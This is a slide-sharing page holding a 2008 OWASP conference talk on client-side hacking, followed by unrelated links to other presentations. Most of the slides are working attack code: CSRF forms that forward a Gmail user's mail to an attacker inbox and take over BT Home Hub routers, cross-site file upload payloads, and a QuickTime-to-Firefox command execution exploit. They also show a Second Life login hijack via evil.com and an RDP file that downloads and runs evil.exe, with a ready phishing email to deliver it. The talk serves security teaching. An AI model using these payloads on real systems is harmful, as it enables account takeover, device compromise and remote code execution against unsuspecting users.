owasp belgium appsec 2008 conference
play

OWASP BELGIUM APPSEC 2008 CONFERENCE pdp information security - PowerPoint PPT Presentation

Nov 06, 2022 •110 likes •766 views

OWASP BELGIUM APPSEC 2008 CONFERENCE pdp information security researcher, hacker, founder of GNUCITIZEN SALES PITCH Cutting-edge Think Tank THERE ISN'T ANY! CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and

  2. OWASP BELGIUM APPSEC 2008 CONFERENCE

  3. pdp information security researcher, hacker, founder of GNUCITIZEN

  4. SALES PITCH

  5. Cutting-edge Think Tank

  6.  THERE ISN'T ANY!

  8. CLIENT-SIDE SECURITY Overview of various Client-Side Hacking Tricks and Techniques

  9. OBJECTIVES  I was planning to...  Research Design Issues.  Innovate.  Mix & Match Ideas.  I am not a bug hunter, therefore...  Concentrate on the practicalities.  Look for things I could use in my work.  Have fun.

  10. CLIENTS & SERVERS  Symbiosis  Clients & Servers are in a constant interaction.  This interaction comes in various forms.  Their security model is shared.

  11. THE GMAIL HIJACK TECHNIQUE

  12. THE GMAIL HIJACK TECHNIQUE

  13. THE GMAIL HIJACK TECHNIQUE

  14. THE GMAIL HIJACK TECHNIQUE  Via a CSRF Redirection Utility http://www.gnucitizen.org/util/csrf  ?_method=POST&_enctype=multipart/form-data &_action=https%3A//mail.google.com/mail/h/ewt1jmuj4ddv/%3Fv%3Dprf &cf2_emc=true &cf2_email=evilinbox@mailinator.com &cf1_from &cf1_to &cf1_subj &cf1_has &cf1_hasnot &cf1_attach=true &tfi&s=z &irf=on&nvp_bu_cftb=Create%20Filter

  15. THE GMAIL HIJACK TECHNIQUE  HTML Code <html>  <body> <form name="form" method="POST" enctype="multipart/form-data" action="https://mail.google.com/mail/h/ewt1jmuj4ddv/?v=prf"> <input type="hidden" name="cf2_emc" value="true"/> <input type="hidden" name="cf2_email" value="evilinbox@mailinator.com"/> <input type="hidden" name="cf1_from" value=""/> <input type="hidden" name="cf1_to" value=""/> <input type="hidden" name="cf1_subj" value=""/> <input type="hidden" name="cf1_has" value=""/><input type="hidden" name="cf1_hasnot" value=""/> <input type="hidden" name="cf1_attach" value="true"/> <input type="hidden" name="tfi" value=""/> <input type="hidden" name="s" value="z"/> <input type="hidden" name="irf" value="on"/> <input type="hidden" name="nvp_bu_cftb" value="Create Filter"/> </form> <script>form.submit()</script> </body> </html>

  16. SOMEONE GOT HACKED It is unfortunate, but it gives us a good case study!

  17. PWNING BT HOME HUB  Enable Remote Assistance <html>  <!-- ras.html --> <head></head> <body> <form name='raccess' action='http://192.168.1.254/cgi/b/ras//?ce=1&be=1&l0=5&l1=5' method='post'> <input type='hidden' name='0' value='31'> <input type='hidden' name='1' value=''> <input type='hidden' name='30' value='12345678'> <!-- <input type='submit' value="own it!"> --> </form> <script>document.raccess.submit();</script> </body> </html>

  18. PWNING BT HOME HUB  Disable Wireless Connectivity <html>  <body> <!-- disable_wifi_interface.html --> <!-- POST /cgi/b/_wli_/cfg/?ce=1&be=1&l0=4&l1=0&name= HTTP/1.1 0=10&1=&32=&33=&34=2&35=1&45=11&47=1 --> <form action="http://192.168.1.254/cgi/b/_wli_/cfg//" method="post"> <input type="hidden" name="0" value="10"> <input type="hidden" name="1" value=""> <input type="hidden" name="32" value=""> <input type="hidden" name="33" value=""> <input type="hidden" name="34" value="2"> <input type="hidden" name="35" value="1"> <input type="hidden" name="45" value="11"> <input type="hidden" name="47" value="1"> </form> <script>document.forms[0].submit();</script> </body> </html>

  19. PWNING BT HOME HUB  Call Jacking POST http://api.home/cgi/b/_voip_/stats//?ce=1&be=0&l0=-1&l1=-  1&name= 0=30&1= 00390669893461  Is that the Vatican number?

  20. PWNED!!! Thanks to AP!!!

  21. PWNED!!! SNOM .mario hacked Snom

  22. CROSS-SITE FILE UPLOAD ATTACKS  The Flash Method <mx:Application xmlns:mx="http://www.adobe.com/2006/mxml"  creationComplete="onAppInit()"> <mx:Script> /* by Petko D. Petkov; pdp * GNUCITIZEN **/ import flash.net.*; private function onAppInit():void { var r:URLRequest = new URLRequest('http://victim.com/upload.php'); r.method = 'POST'; r.data = unescape('----------------------------- 109092118919201%0D%0AContent-Disposition%3A form-data%3B name%3D%22file%22%3B filename%3D%22gc.txt%22%0D%0AContent-Type%3A text%2Fplain%0D%0A%0D%0AHi from GNUCITIZEN%21%0D%0A-----------------------------109092118919201%0D%0AContent- Disposition%3A form-data%3B name%3D%22submit%22%0D%0A%0D%0ASubmit Query%0D%0A-----------------------------109092118919201--%0A'); r.contentType = 'multipart/form-data; boundary=---------------------------109092118919201'; navigateToURL(r, '_self'); } </mx:Script> </mx:Application>

  23. CROSS-SITE FILE UPLOAD ATTACKS  The FORM Method <form method="post" action="http://kuza55.awardspace.com/files.php"  enctype="multipart/form-data"> <textarea name='file"; filename="filename.ext Content-Type: text/plain; '>Arbitrary File Contents</textarea> <input type="submit" value='Send "File"' /> </form>  by kuza55  Opera doesn't like it!

  24. QUICKTIME PWNS FIREFOX  QuickTime Media Links <?xml version="1.0">  <?quicktime type="application/x-quicktime-media-link"?> <embed src="Sample.mov" autoplay="true"/>  Supported File Extensions 3g2, 3gp, 3gp2, 3gpp, AMR, aac, adts, aif, aifc, aiff, amc, au,  avi, bwf, caf, cdda, cel, flc, fli, gsm, m15, m1a, m1s, m1v, m2a, m4a, m4b, m4p, m4v, m75, mac, mov, mp2, mp3, mp4, mpa, mpeg, mpg, mpm, mpv, mqv, pct, pic, pict, png, pnt, pntg, qcp, qt, qti, qt

  25. QUICKTIME PWNS FIREFOX  The Exploit <?xml version="1.0">  <?quicktime type="application/x-quicktime-media-link"?> <embed src="a.mp3" autoplay="true" qtnext=" -chrome javascript:file=Components.classes['@mozilla.org/file/local;1'].cre ateInstance(Components.interfaces.nsILocalFile);file.initWithPath(' c:\\windows\\system32\\calc.exe');process=Components.classes['@mozi lla.org/process/util;1'].createInstance(Components.interfaces.nsIPr ocess);process.init(file);process.run(true,[],0);void(0); "/>

  26. QUICKTIME PWNS FIREFOX  The Exploit  qtnext=" -chrome javascript:...

  27. IE PWNS SECOND LIFE  The Exploit  <iframe src=' secondlife://" -autologin -loginuri "http://evil.com/sl/record- login.php' ></iframe>

  28. IE PWNS SECOND LIFE  Avatar Theft [HTTP_RAW_POST_DATA] => <methodCall>  <methodName>login_to_simulator</methodName> … … … <member> <name>passwd</name> <value> <string>$1$ [MD5 Hash of the password here] </string> </value> </member> … … … </methodCall>

  29. IE PWNS SECOND LIFE  …with that  <?php ob_start(); print_r($GLOBALS); error_log(ob_get_contents(), 0); ob_end_clean(); ?>

  30. ALL YOUR AVATARS ARE BELONG TO US!!!

  31. CITRIX/RDP COMMAND FIXATION ATTACKS  CITRIX ICA [WFClient]  Version=1 [ApplicationServers] Connection To Citrix Server= [Connection To Citrix Server] InitialProgram= some command here Address= 172.16.3.191 ScreenPercent=0  Microsoft RDP screen mode id:i:1  desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: some command here shell working directory:s:C:\ bitmapcachepersistenable:i:1

  32. CITRIX/RDP COMMAND FIXATION ATTACKS  The Malicious One  screen mode id:i:1 desktopwidth:i:800 desktopheight:i:600 session bpp:i:16 full address:s: 172.16.3.191 compression:i:1 keyboardhook:i:2 alternate shell:s: cmd.exe /C “tftp -i evil.com GET evil.exe evil.exe & evil.exe” shell working directory:s:C:\ bitmapcachepersistenable:i:1

  33. Hello John, This is Tim from Tech Department. I was informed that you have some problems with your remote desktop connectivity. I’ve attached a modified RDP file you can tryout and see if it works. Just double click on the file and login. Your domain credentials should work. Let me know if you have any problems. Tim O’Brian Tech Department

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Chapter Meeting OWASP_Geneva 2015/10/19 About Me Thomas Hofer Java DEV / AppSec

Chapter Meeting OWASP_Geneva 2015/10/19 About Me Thomas Hofer Java DEV / AppSec

OWASP Dependency-Check Chapter Meeting OWASP_Geneva 2015/10/19 About Me Thomas Hofer Java DEV / AppSec OWASP Geneva Board State of Geneva @thhofer thomas.hofer@owasp.org Outline Context How it works / Integration

335 views • 9 slides
Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017

Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017

Welcome to the OWASP Toronto Meetup Hello, and happy 2018! Announcement: OWASP Top 10 2017 Changes between 2013 and 2017 Hi, I am X. How do I get into AppSec/Security? OWASP Toronto Chapter January 17, 2018 Topics Overviews, Career Paths,

372 views • 36 slides
OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation

OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation

The OWASP Foundation Libre Software Meeting Brussels 10-July-2013 http://www.owasp.org OpenSAMM Software Assurance Maturity Model Seba Deleersnyder seba@owasp.org OWASP Foundation Board Member OWASP Belgium Chapter Leader SAMM project

682 views • 43 slides
New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200

New Privacy in Android 11 and OWASP Mobile Security Albert Hsieh OWASP 200 OWASP Flagship Projects Tool Projects OWASP Amass OWASP CSRFGuard OWASP Defectdojo OWASP Dependency-Check OWASP Dependency-Track

751 views • 55 slides
OWASP Daniel Brzozowski daniel@brzozowski.biz Agenda 1. Few words about OWASP 2. Owasp resources

OWASP Daniel Brzozowski daniel@brzozowski.biz Agenda 1. Few words about OWASP 2. Owasp resources

OWASP Daniel Brzozowski daniel@brzozowski.biz Agenda 1. Few words about OWASP 2. Owasp resources 3. Setting up workstations 4. OWASP WebScarab/OWASP WebScarab-NG 5. O2 Platform About me In London since October 2010 Before that MCPD, MCTS,

747 views • 58 slides
OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com

OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com

Introduction to the OWASP Top Ten Kirk Jackson OWASP NZ RedShield https://www.meetup.com/ kirk@pageofwords.com OWASP-Wellington/ http://hack-ed.com www.owasp.org.nz Recordings: @kirkj @owaspnz https://goo.gl/a2VSG2 What is OWASP? Open

880 views • 45 slides
Cookie Security Myths and Misconceptions David Johansson OWASP London 30 Nov. 2017 About Me

Cookie Security Myths and Misconceptions David Johansson OWASP London 30 Nov. 2017 About Me

Cookie Security Myths and Misconceptions David Johansson OWASP London 30 Nov. 2017 About Me David Johansson (@securitybits) Security consultant with 10 years in AppSec Helping clients design and build secure software Develop

613 views • 32 slides
OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our

OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our

OWASP Foundation OWASP does not endorse or recommend commercial products or services , allowing our community to remain vendor neutral with the collective wisdom of the best minds in software security worldwide. OWASP Foundation, NYC Chapter

382 views • 23 slides
Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10

Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10

Broken Authentication: What it means, and what you can do hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access

207 views • 6 slides
Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter

Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter

Insecurity in Informaton Technology Tanya Janca Tanya.Janca@owasp.org OWASP Otawa Chapter Leader OWASP DevSlop Project Leader @SheHacksPurple About Me The Im Qualifed Slide Tanya Janca: Applicaton security evangelist, web

1k views • 82 slides
Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web

Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web

Web Attacks Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web Security Risks https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010-2017%20(en).pdf Today

998 views • 78 slides
Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva

Introduction to OWASP Mobile Application Security Verification Standard (MASVS) OWASP Geneva 12/12/2016 Jrmy MATOS whois securingapps Developer background Spent last 10 years working between Geneva and Lausanne on security products

867 views • 22 slides
SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017

SQL Injection Attacks: A Quick Primer hassan.abudu@owasp.org OWASP Top 10 Vulnerabilities - 2017 Rank Name 1 Injection 2 Broken Authentication 3 Sensitive Data Exposure 4 XML External Entities 5 Broken Access Control 6 Security

682 views • 8 slides
Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten

Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten

Web Attacks Nadia Heninger and Deian Stefan Slides from Zakir Durumeric and Dan Boneh OWASP Ten Most Critical Web Security Risks https://github.com/OWASP/Top10/blob/master/2017/OWASP%20Top%2010-2017%20(en).pdf Today

916 views • 87 slides
From Dev to Security Rey Bango (@reybango) AppSec is hard Credit:

From Dev to Security Rey Bango (@reybango) AppSec is hard Credit:

From Dev to Security Rey Bango (@reybango) AppSec is hard Credit: https://imgur.com/user/PipePistoleer Implicit trust On average, each Web application that Positive Technologies inspected contained 33 vulnerabilities . Of those, six were high-

763 views • 47 slides
Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German

Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German

Introduction to Mobile Security Testing Approaches and Examples using OWASP MSTG OWASP German Day 20.11.2018 Carlos Holguera $ whoami Carlos Holguera [olera] Security Engineer working at ESCRYPT GmbH since 2012 Area of expertise:

790 views • 56 slides
Overview 1. A step back: a look at the data we had to work with 2. Requirements for the

Overview 1. A step back: a look at the data we had to work with 2. Requirements for the

1/19 Overview 1. A step back: a look at the data we had to work with 2. Requirements for the application 3. Basic choices made for data storage 4. Specific technologies we use 5. A detailed example: storage of the tagging 6. A note on

689 views • 19 slides
Digital TV and MPEG- Digital TV and MPEG-2 -2 2 Digital TV and MPEG Standards Standards

Digital TV and MPEG- Digital TV and MPEG-2 -2 2 Digital TV and MPEG Standards Standards

Digital TV and MPEG- Digital TV and MPEG-2 -2 2 Digital TV and MPEG Standards Standards Standards Fernando Pereira Fernando Pereira Fernando Pereira Klagenfurt, Austria, October 2008 Klagenfurt, Austria, October 2008 Audiovisual

1.35k views • 76 slides
Sound in Java 3D NB When using a linux box make sure audio is actually enabled first with a

Sound in Java 3D NB When using a linux box make sure audio is actually enabled first with a

Sound in Java 3D NB When using a linux box make sure audio is actually enabled first with a command line test such as auplay file Java 3D requires an AudioDevice to be selected AudioDevice can be used to specify mono, stereo,

355 views • 4 slides
Terrain Unitys Terrain editor islands topographical landscapes Mountains And

Terrain Unitys Terrain editor islands topographical landscapes Mountains And

Terrain Unitys Terrain editor islands topographical landscapes Mountains And more 12. Create a new Scene terrain and save it 13. GameObject &gt; 3D Object &gt; Terrain CS / DES Creative Coding Computer Science

878 views • 42 slides
CHAPTER 2 - DIGITAL DATA REPRESENTATION AND NUMBERING SYSTEMS INTRODUCTION Digital

CHAPTER 2 - DIGITAL DATA REPRESENTATION AND NUMBERING SYSTEMS INTRODUCTION Digital

CHAPTER 2 - DIGITAL DATA REPRESENTATION AND NUMBERING SYSTEMS INTRODUCTION Digital computers use sequences of binary digits (bits) to represent numbers, letters, special symbols, music, pictures, and videos. For this reason, we study the

530 views • 30 slides
Real Streaming / Helix (RealNetworks) Armen Kasamanyan Digital Media Workflow Create =&gt;

Real Streaming / Helix (RealNetworks) Armen Kasamanyan Digital Media Workflow Create =&gt;

Real Streaming / Helix (RealNetworks) Armen Kasamanyan Digital Media Workflow Create =&gt; Deliver =&gt; Play Create : create compelling content to drive business benefits Deliver : unified infrastructure for zero-failure delivery to

591 views • 13 slides
7. Sound CHAPTER HIGHLIGHTS Nature of sound Sine waves amplitude frequency Sine waves,

7. Sound CHAPTER HIGHLIGHTS Nature of sound Sine waves amplitude frequency Sine waves,

10/12/2016 CHAPTER 7. Sound CHAPTER HIGHLIGHTS Nature of sound Sine waves amplitude frequency Sine waves, amplitude, frequency Traditional sound reproduction Digital sound Sampled Synthesized Synthesized

330 views • 12 slides
Neil Young Honey Slides mp3, flac, wma DOWNLOAD LINKS (Clickable) Genre: Blues / Folk, World,

Neil Young Honey Slides mp3, flac, wma DOWNLOAD LINKS (Clickable) Genre: Blues / Folk, World,

Neil Young Honey Slides mp3, flac, wma DOWNLOAD LINKS (Clickable) Genre: Blues / Folk, World, &amp; Country Album: Honey Slides Country: US Released: 2016 Style: Country, Country Blues MP3 version RAR size: 1240 mb FLAC version RAR size: 1160 mb

792 views • 3 slides

More recommend